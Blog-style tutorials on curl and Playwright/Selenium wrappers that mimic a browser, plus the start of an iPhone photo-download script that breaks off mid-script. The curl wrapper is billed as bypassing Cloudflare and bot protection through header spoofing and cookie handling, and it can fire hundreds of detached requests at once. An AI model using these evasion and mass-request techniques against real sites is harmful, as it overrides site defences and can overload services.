  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
-X POST --form \
-d "user=user&pass=pass" \
"$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
"$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
--async --count 20 \
"$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
"https://example.com/"
"https://example.com/"
"https://example.com/"
)
for url in "${URLS[@]}"; do
echo "Fetching: $url"
node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
echo "$(date): Service healthy"
else
echo "$(date): Service unhealthy"
fi
sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal GET/headers/redirect/cookie-capable script. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client; Selenium focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys, time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
RED='\033[31m'; GRN='\033[32m'; YLW='\033[33m'; NC='\033[0m'
def parse_args():
p = argparse.ArgumentParser(description='Minimal Selenium GET client')
p.add_argument('url')
p.add_argument('-o','--output')
p.add_argument('-c','--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
p.add_argument('--show-headers', action='store_true')
p.add_argument('-t','--timeout', type=int, default=30)
p.add_argument('-A','--user-agent')
p.add_argument('-v','--verbose', action='store_true')
return p.parse_args()
args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
opts.add_argument(f'--user-agent={args.user_agent}')
with webdriver.Chrome(options=opts) as driver:
driver.set_page_load_timeout(args.timeout)
# Load cookies if present (domain-specific; best-effort)
if os.path.exists(args.cookie):
try:
ck = json.load(open(args.cookie))
for c in ck.get('cookies', []):
try:
driver.get('https://' + c.get('domain').lstrip('.'))
driver.add_cookie({
'name': c['name'], 'value': c['value'], 'path': c.get('path','/'),
'domain': c.get('domain'), 'secure': c.get('secure', False)
})
except Exception:
pass
except Exception:
pass
driver.get(args.url)
# Persist cookies (best-effort)
try:
cookies = driver.get_cookies()
json.dump({'cookies': cookies}, open(args.cookie, 'w'), indent=2)
except Exception:
pass
if args.output:
open(args.output, 'w').write(driver.page_source)
else:
sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.

Resources

Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash
# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false
# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
usage() {
cat << EOH
Usage: $(basename "$0") [OPTIONS] URL
Advanced curl wrapper that mimics browser behavior to bypass bot protection.
OPTIONS:
-X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
-d, --data DATA           POST/PUT data
-H, --header HEADER       Add custom header (can be used multiple times)
-o, --output FILE         Write output to file
-c, --cookie FILE         Use custom cookie file [default: temp file]
-A, --user-agent UA       Custom user agent [default: Chrome on macOS]
-t, --timeout SECONDS     Request timeout [default: 30]
--async                   Run request asynchronously in background
--count N                 Number of async requests to fire [default: 1, requires --async]
--no-redirect             Don't follow redirects
--show-headers            Show response headers
--json                    Send data as JSON (sets Content-Type)
--form                    Send data as form-urlencoded
-v, --verbose             Verbose output
-h, --help                Show this help message
EXAMPLES:
# Simple GET request
$(basename "$0") https://example.com
# Async GET request
$(basename "$0") --async https://example.com
# POST with JSON data
$(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login
# POST with form data
$(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login
# Multiple async requests (using loop)
for i in {1..10}; do
$(basename "$0") --async https://example.com/api/endpoint
done
# Multiple async requests (using --count)
$(basename "$0") --async --count 10 https://example.com/api/endpoint
EOH
exit 0
}
# Parse arguments
EXTRA_HEADERS=()
URL=""
while [[ $# -gt 0 ]]; do
case $1 in
-X|--method)
METHOD="$2"
shift 2
;;
-d|--data)
DATA="$2"
shift 2
;;
-H|--header)
EXTRA_HEADERS+=("$2")
shift 2
;;
-o|--output)
OUTPUT_FILE="$2"
shift 2
;;
-c|--cookie)
COOKIE_FILE="$2"
shift 2
;;
-A|--user-agent)
USER_AGENT="$2"
shift 2
;;
-t|--timeout)
TIMEOUT="$2"
shift 2
;;
--async)
ASYNC=true
shift
;;
--count)
COUNT="$2"
shift 2
;;
--no-redirect)
FOLLOW_REDIRECTS=false
shift
;;
--show-headers)
SHOW_HEADERS=true
shift
;;
--json)
CONTENT_TYPE="application/json"
shift
;;
--form)
CONTENT_TYPE="application/x-www-form-urlencoded"
shift
;;
-v|--verbose)
VERBOSE=true
shift
;;
-h|--help)
usage
;;
*)
if [[ -z "$URL" ]]; then
URL="$1"
else
echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
exit 1
fi
shift
;;
esac
done
# Validate URL
if [[ -z "$URL" ]]; then
echo -e "${RED}Error: URL is required${NC}" >&2
usage
fi
# Validate count
if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
echo -e "${RED}Error: --count requires --async${NC}" >&2
exit 1
fi
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
exit 1
fi
# Execute curl
execute_curl() {
# Build curl arguments as array instead of string
local -a curl_args=()
# Basic options
curl_args+=("--compressed")
curl_args+=("--max-time" "$TIMEOUT")
curl_args+=("--connect-timeout" "10")
curl_args+=("--http2")
# Cookies (ensure file exists to avoid curl warning)
: > "$COOKIE_FILE" 2>/dev/null || true
curl_args+=("--cookie" "$COOKIE_FILE")
curl_args+=("--cookie-jar" "$COOKIE_FILE")
# Follow redirects
if [[ "$FOLLOW_REDIRECTS" == true ]]; then
curl_args+=("--location")
fi
# Show headers
if [[ "$SHOW_HEADERS" == true ]]; then
curl_args+=("--include")
fi
# Output file
if [[ -n "$OUTPUT_FILE" ]]; then
curl_args+=("--output" "$OUTPUT_FILE")
fi
# Verbose
if [[ "$VERBOSE" == true ]]; then
curl_args+=("--verbose")
else
curl_args+=("--silent" "--show-error")
fi
# Method
curl_args+=("--request" "$METHOD")
# Browser-like headers
curl_args+=("--header" "User-Agent: $USER_AGENT")
curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
curl_args+=("--header" "Connection: keep-alive")
curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
curl_args+=("--header" "Sec-Fetch-Dest: document")
curl_args+=("--header" "Sec-Fetch-Mode: navigate")
curl_args+=("--header" "Sec-Fetch-Site: none")
curl_args+=("--header" "Sec-Fetch-User: ?1")
curl_args+=("--header" "Cache-Control: max-age=0")
# Content-Type for POST/PUT
if [[ -n "$DATA" ]]; then
if [[ -n "$CONTENT_TYPE" ]]; then
curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
fi
curl_args+=("--data" "$DATA")
fi
# Extra headers
for header in "${EXTRA_HEADERS[@]}"; do
curl_args+=("--header" "$header")
done
# URL
curl_args+=("$URL")
if [[ "$ASYNC" == true ]]; then
# Run asynchronously in background
if [[ "$VERBOSE" == true ]]; then
echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
fi
# Fire multiple requests if count > 1
local pids=()
for ((i=1; i<=COUNT; i++)); do
# Run in background detached, suppress all output
nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
local pid=$!
disown $pid
pids+=("$pid")
done
if [[ "$COUNT" -eq 1 ]]; then
echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
else
echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
fi
else
# Run synchronously
if [[ "$VERBOSE" == true ]]; then
echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
fi
curl "${curl_args[@]}"
local exit_code=$?
if [[ $exit_code -ne 0 ]]; then
echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
return $exit_code
fi
fi
}
# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
rm -f "$COOKIE_FILE"
fi
}
# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
trap cleanup EXIT
fi
# Main execution
execute_curl
# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
-d '{"username":"user","password":"pass"}' \
https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
-d "username=user&password=pass" \
https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
-H "X-API-Key: your-key" \
-H "Authorization: Bearer token" \
https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"
# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
-X POST --form \
-d "user=test&pass=secret" \
https://example.com/login
# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
https://example.com/dashboard

Load testing patterns

Simple load test with –count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
./browser_curl.sh --async "$URL" > /dev/null 2>&1
((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

OptionDescriptionDefault
-X, --methodHTTP method (GET/POST/PUT/DELETE)GET
-d, --dataRequest body (JSON or form)
-H, --headerAdd extra headers (repeatable)
-o, --outputWrite response to a filestdout
-c, --cookieCookie file to use (and persist)temp file
-A, --user-agentOverride User-AgentChrome/macOS
-t, --timeoutMax request time in seconds30
--asyncRun request(s) in the backgroundfalse
--count NFire N async requests (requires --async)1
--no-redirectDon’t follow redirectsfollows
--show-headersInclude response headersfalse
--jsonSets Content-Type: application/json
--formSets Content-Type: application/x-www-form-urlencoded
-v, --verboseVerbose diagnosticsfalse
-h, --helpShow usage

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior
  • Maintains session cookies across redirects and calls
  • Persists cookies to file for reuse
  • Automatically created and cleaned up

Redirect handling

  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.

Real-world examples

Example 1: API authentication flow

cd ~/Desktop/warp
bash -c 'cat > test_auth.sh << '\''SCRIPT'\''
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"
echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json -d "{\"username\":\"user\",\"password\":\"pass\"}" "$API_BASE/auth/login" > /dev/null
echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .
echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"
echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh'

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
"https://example.com/page1"
"https://example.com/page2"
"https://example.com/page3"
)
for url in "${URLS[@]}"; do
echo "Fetching: $url"
./browser_curl.sh -o "$(basename "$url").html" "$url"
sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"
while true; do
if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
echo "$(date): Service healthy"
else
echo "$(date): Service unhealthy"
fi
sleep 30
done

Installing browser_curl to your PATH

If you want browser_curl.sh to be available anywhere then install it on your path using:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ~/Desktop/warp/browser_curl.sh ~/.local/bin/browser_curl
echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc
echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc
echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com
# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com
# Production mode
./browser_curl.sh https://example.com

Cause: First-time cookie file creation

Solution: The script now pre-creates the cookie file automatically. You can ignore any residual warnings.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches:

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file
  3. Use browser_curl.sh -c cookies.txt for subsequent requests

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

TestTimeRequests/sec
Single sync requestapproximately 0.2s
10 async requests (–count)approximately 0.03s333/s
100 async requests (–count)approximately 0.09s1111/s
1000 async requests (–count)approximately 0.8s1250/s

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain

Conclusion

browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.

Resources

A Script to download Photos, Videos and Images from your iPhone to your Macbook (by creation date and a file name filter)

Annoying Apple never quite got around to making it easy to offload images from your iPhone to your Macbook. So below is a complete guide to automatically download photos and videos from your iPhone to your MacBook, with options to filter by pattern and date, and organize into folders by creation date.

Prerequisites

Install the required tools using Homebrew:

cat > install_iphone_util.sh << 'EOF'
#!/bin/bash
set -e
echo "Installing tools..."
echo "Installing macFUSE"
brew install --cask macfuse
echo "Adding Brew Tap" 
brew tap gromgit/fuse
echo "Installing ifuse-mac" 
brew install gromgit/fuse/ifuse-mac
echo "Installing libimobiledevice" 
brew install libimobiledevice
echo "Installing exiftool"
brew install exiftool
echo "Done! Tools installed."
EOF
echo "Making executable..."
chmod +x install_iphone_util.sh
./install_iphone_util.sh

Setup/Pair your iPhone to your Macbook

  1. Connect your iPhone to your MacBook via USB
  2. Trust the computer on your iPhone when prompted
  3. Verify the connection:
idevicepair validate

If not paired, run:

idevicepair pair

Download Script

Run the script below to create the file download-iphone-media.sh in your current directory:

#!/bin/bash
cat > download-iphone-media.sh << 'OUTER_EOF'
#!/bin/bash
# iPhone Media Downloader
# Downloads photos and videos from iPhone to MacBook
# Supports resumable, idempotent downloads
set -e
# Default values
PATTERN="*"
OUTPUT_DIR="."
ORGANIZE_BY_DATE=false
START_DATE=""
END_DATE=""
MOUNT_POINT="/tmp/iphone_mount"
STATE_DIR=""
VERIFY_CHECKSUM=true
# Usage function
usage() {
cat << 'INNER_EOF'
Usage: $0 [OPTIONS]
Download photos and videos from iPhone to MacBook.
OPTIONS:
-p PATTERN          File pattern to match (e.g., "*.jpg", "*.mp4", "IMG_*")
Default: * (all files)
-o OUTPUT_DIR       Output directory (default: current directory)
-d                  Organize files by creation date into YYYY/MMM folders
-s START_DATE       Start date filter (YYYY-MM-DD)
-e END_DATE         End date filter (YYYY-MM-DD)
-r                  Resume incomplete downloads (default: true)
-n                  Skip checksum verification (faster, less safe)
-h                  Show this help message
EXAMPLES:
# Download all photos and videos to current directory
$0
# Download only JPG files to ~/Pictures/iPhone
$0 -p "*.jpg" -o ~/Pictures/iPhone
# Download all media organized by date
$0 -d -o ~/Pictures/iPhone
# Download videos from specific date range
$0 -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/iPhone
# Download specific IMG files organized by date
$0 -p "IMG_*.{jpg,heic}" -d -o ~/Photos
INNER_EOF
exit 1
}
# Parse command line arguments
while getopts "p:o:ds:e:rnh" opt; do
case $opt in
p) PATTERN="$OPTARG" ;;
o) OUTPUT_DIR="$OPTARG" ;;
d) ORGANIZE_BY_DATE=true ;;
s) START_DATE="$OPTARG" ;;
e) END_DATE="$OPTARG" ;;
r) ;; # Resume is default, keeping for backward compatibility
n) VERIFY_CHECKSUM=false ;;
h) usage ;;
*) usage ;;
esac
done
# Create output directory if it doesn't exist
mkdir -p "$OUTPUT_DIR"
OUTPUT_DIR=$(cd "$OUTPUT_DIR" && pwd)
# Set up state directory for tracking downloads
STATE_DIR="$OUTPUT_DIR/.iphone_download_state"
mkdir -p "$STATE_DIR"
# Create mount point
mkdir -p "$MOUNT_POINT"
echo "=== iPhone Media Downloader ==="
echo "Pattern: $PATTERN"
echo "Output: $OUTPUT_DIR"
echo "Organize by date: $ORGANIZE_BY_DATE"
[ -n "$START_DATE" ] && echo "Start date: $START_DATE"
[ -n "$END_DATE" ] && echo "End date: $END_DATE"
echo ""
# Check if iPhone is connected
echo "Checking for iPhone connection..."
if ! ideviceinfo -s > /dev/null 2>&1; then
echo "Error: No iPhone detected. Please connect your iPhone and trust this computer."
exit 1
fi
# Mount iPhone
echo "Mounting iPhone..."
if ! ifuse "$MOUNT_POINT" 2>/dev/null; then
echo "Error: Failed to mount iPhone. Make sure you've trusted this computer on your iPhone."
exit 1
fi
# Cleanup function
cleanup() {
local exit_code=$?
echo ""
if [ $exit_code -ne 0 ]; then
echo "⚠ Download interrupted. Run the script again to resume."
fi
echo "Unmounting iPhone..."
umount "$MOUNT_POINT" 2>/dev/null || true
rmdir "$MOUNT_POINT" 2>/dev/null || true
}
trap cleanup EXIT
# Find DCIM folder
DCIM_PATH="$MOUNT_POINT/DCIM"
if [ ! -d "$DCIM_PATH" ]; then
echo "Error: DCIM folder not found on iPhone"
exit 1
fi
echo "Scanning for files matching pattern: $PATTERN"
echo ""
# Counter
TOTAL_FILES=0
COPIED_FILES=0
SKIPPED_FILES=0
RESUMED_FILES=0
FAILED_FILES=0
# Function to compute file checksum
compute_checksum() {
local file="$1"
if [ -f "$file" ]; then
shasum -a 256 "$file" 2>/dev/null | awk '{print $1}'
fi
}
# Function to get file size
get_file_size() {
local file="$1"
if [ -f "$file" ]; then
stat -f "%z" "$file" 2>/dev/null
fi
}
# Function to mark file as completed
mark_completed() {
local source_file="$1"
local dest_file="$2"
local checksum="$3"
local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
echo "$dest_file|$checksum|$(date +%s)" > "$state_file"
}
# Function to check if file was previously completed
is_completed() {
local source_file="$1"
local dest_file="$2"
local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
if [ ! -f "$state_file" ]; then
return 1
fi
# Read state file
local saved_dest saved_checksum saved_timestamp
IFS='|' read -r saved_dest saved_checksum saved_timestamp < "$state_file"
# Check if destination file exists and matches
if [ "$saved_dest" = "$dest_file" ] && [ -f "$dest_file" ]; then
if [ "$VERIFY_CHECKSUM" = true ]; then
local current_checksum=$(compute_checksum "$dest_file")
if [ "$current_checksum" = "$saved_checksum" ]; then
return 0
fi
else
# Without checksum verification, just check file exists
return 0
fi
fi
return 1
}
# Convert dates to timestamps for comparison
START_TIMESTAMP=""
END_TIMESTAMP=""
if [ -n "$START_DATE" ]; then
START_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$START_DATE" "+%s" 2>/dev/null || echo "")
if [ -z "$START_TIMESTAMP" ]; then
echo "Error: Invalid start date format. Use YYYY-MM-DD"
exit 1
fi
fi
if [ -n "$END_DATE" ]; then
END_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$END_DATE" "+%s" 2>/dev/null || echo "")
if [ -z "$END_TIMESTAMP" ]; then
echo "Error: Invalid end date format. Use YYYY-MM-DD"
exit 1
fi
# Add 24 hours to include the entire end date
END_TIMESTAMP=$((END_TIMESTAMP + 86400))
fi
# Process files
find "$DCIM_PATH" -type f | while read -r file; do
filename=$(basename "$file")
# Check if filename matches pattern (basic glob matching)
if [[ ! "$filename" == $PATTERN ]]; then
continue
fi
TOTAL_FILES=$((TOTAL_FILES + 1))
# Get file creation date
if command -v exiftool > /dev/null 2>&1; then
# Try to get date from EXIF data
CREATE_DATE=$(exiftool -s3 -DateTimeOriginal -d "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
if [ -z "$CREATE_DATE" ]; then
# Fallback to file modification time
CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
fi
else
# Use file modification time
CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
fi
# Extract date components
if [ -n "$CREATE_DATE" ]; then
FILE_DATE=$(echo "$CREATE_DATE" | cut -d' ' -f1)
FILE_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$FILE_DATE" "+%s" 2>/dev/null || echo "")
# Check date filters
